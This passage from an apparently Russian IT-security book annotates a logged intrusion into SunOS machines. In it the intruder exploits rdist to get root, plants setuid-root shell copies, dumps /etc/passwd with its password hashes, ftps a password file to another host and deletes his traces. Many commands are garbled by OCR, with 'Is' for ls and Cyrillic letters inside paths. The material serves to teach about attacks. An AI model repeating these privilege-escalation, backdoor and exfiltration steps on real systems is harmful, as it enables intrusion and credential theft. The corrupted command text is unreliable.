Читаем IT-безопасность: стоит ли рисковать корпорацией? полностью

Снова он воссоздает свою небольшую С-программу (опущенную по соображениям безопасности) для того, чтобы воспользоваться программной ошибкой, открывающей защиту, и получить права доступа суперпользователя (root). Теперь он имеет полный контроль (доступ root) над системой tsunami.

142$ ftp valley

143 Connected to valley

144 220 valley FTP server (SunOS 4.1) ready.

145 Name (valley: jeff): ingres

146 331 Password required for ingres.

147 Password:

148 230 User ingres logged in.

149 ftp> send aaa

150 200 PORT command successful.

151 150 ASCII data connection for aaa

152 226 ASCII Transfer complete.

153 local: aaa remote: aaa

154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s)

155 ftp> get foo

156 200 PORT command successful.

157 150 ASCII data connection for foo

158 226 ASCII Transfer complete.

159 local: foo remote: foo

160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s)

161 ftp> quit

162 221 Goodbye.

163 $ cat too | /usr/ucb/rdist — Server localhost

164$/tmp/sh

165#rmfoo

166#rm/tmp/sh

167 rm: override protection 755 for /tmp/sh? у

168#edc.c

169#ccc.c

170 #chmod 6777 a.out

171 #./a.out

172 # id

173 uid=0(root) gid=0(wheel) groups=50(iastaff)

Строки с № 174 по № 182

Хакер ищет, есть ли в файле /etc/passwd какие-нибудь записи password.old или другие изменения. Он также пытается изменить пароль Jeff в NIS, но безуспешно.

Строки с № 183 по № 197

На этот раз он выводит список содержимого файла /etc/passwd.

174 # Is — ta! /etc/*ass*

175 — rw-r-r-1 root 634 Dec 7 12:31 /etc/passwd

176#cat/etc/}4U

177passwd

178 cat: /etc/}4: No such file or directory

179 Changing NIS password for jeff on suntzu.

180 Old password:

181 New password:

182 Password unchanged.

183 # cat/etc/passwd

184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh

185nobody:*:65534:65534::/:

186daemon:*;1:1::/:

187sys:*:2:2::/:/bin/csh

188bin:*:3:3::/bin:

189 uucp:*:4:8::/var/spool/uucppublic:

190 news:*:6:6::/var/spool/news:/bin/csh

191 ingres:*:7:7::/usr/ingres:/bin/csh

192 audit:*:9:9::/etc/security/audit:/bin/csh

193 sync::1:1::/:/bin/sync

194 sysdiag:*:0;1:Old System Diag:/usr/diag/sysdiag:/usr/diag/ sysdiag/sysdiag

sundiag:*:0:1:System Diag:/usr/diag/su ndiag:/usr/diag/

sundiag/ sundiag

195 operator: INtDk7crldKh2:5:5 — Account forbackups;/usr/ backup: /bin/csh

196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh

197+::0;0:::

Строки с № 198 по № 209

Хакер меняет ID пользователя с суперпользователя обратно на jeff. Затем он повторно проверяет свой ID пользователя и начинает менять имя своего a.out на такое, которое он не забудет (как он уже прежде делал). Снова он запускает команду ls -1 для получения списка с новейшими файлами в начале его.

Строки с № 210 по № 212

Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код и готов идти дальше.

Строки с № 213 по № 227

Хакер проверяет, какие файловые системы подмонтированы.

198 #4)

199 # id

200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff)

201 # тс^С

202 # mv^С

203 #mv a.out shit

204 # Is — tal

205 total 2415

206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.

207 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

208-rw-r-r- 1 root 61 Jan 18 23:11 c.c

209 — rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa

210#rmaaa

211 #rmc.c

212 rm: override protection 644 for c.c? у

213 #df

214 Filesystem kbytes used avail capacity Mounted on

215 /dev/sdOa 10483 5081 4354 54 % /

216 /dev/sdOg 96943 78335 8914 90 % /usr

217 /dev/sdOe 22927 3111 17524 15 %/var

218 /dev/sd1h 1255494 1081249 48696 96 % /home

219 /dev/sd3h 1255494 1030386 99559 91 % /home/se

220 la:/usr/local 2097151 1154033 692365 63 % /usr/local

221 suntzu:/var/spool/mail

222 445852 334295 66972 83 % /var/spool/mail

223 mfp:/home/sybase 318991 244337 42755 85 % /home/sybase

224 арр1:/export/sun/sun4/openwin-3,0

225 189858 131073 39799 77 % /usr/openwin

226 арр1:/export/apps 1255494 771887 358057 68 % /export/apps

227 appl:/export/apps 1255494 771887 358057 68 % /usr/local

Строки с № 228 по № 229

Неверный ввод или, возможно шумы в линии.

Строки с № 230 по № 258

Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользователем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать пользователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se

229 irG-cd: not found

230 # cd/home/se

231 # Is

232 cmeyer hamant lost+found mikec wendy

233 colleen Joseph mark mikep

234 derek kevin matthews neally

235 # cd wendy

236 # cp Дтр/shit.

237 # Is — tal shit

238 — rwxr-xr-x 1 root 24576 Jan 18 23:13 shit

239 # chmod 6777 shit

240 # Is — tal shit

241 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit

242 # pwd

243 /home/se/wendy

244 # cd Amp

245 # Is — tal | more

246 total 2398

247 drwxrwsrwx 3 bin 1024 Jan 18 23:13.

248 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

249 — rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk

250-rw-r-r- 1 cmeyer 12 Jan 13 12:05 junk.dat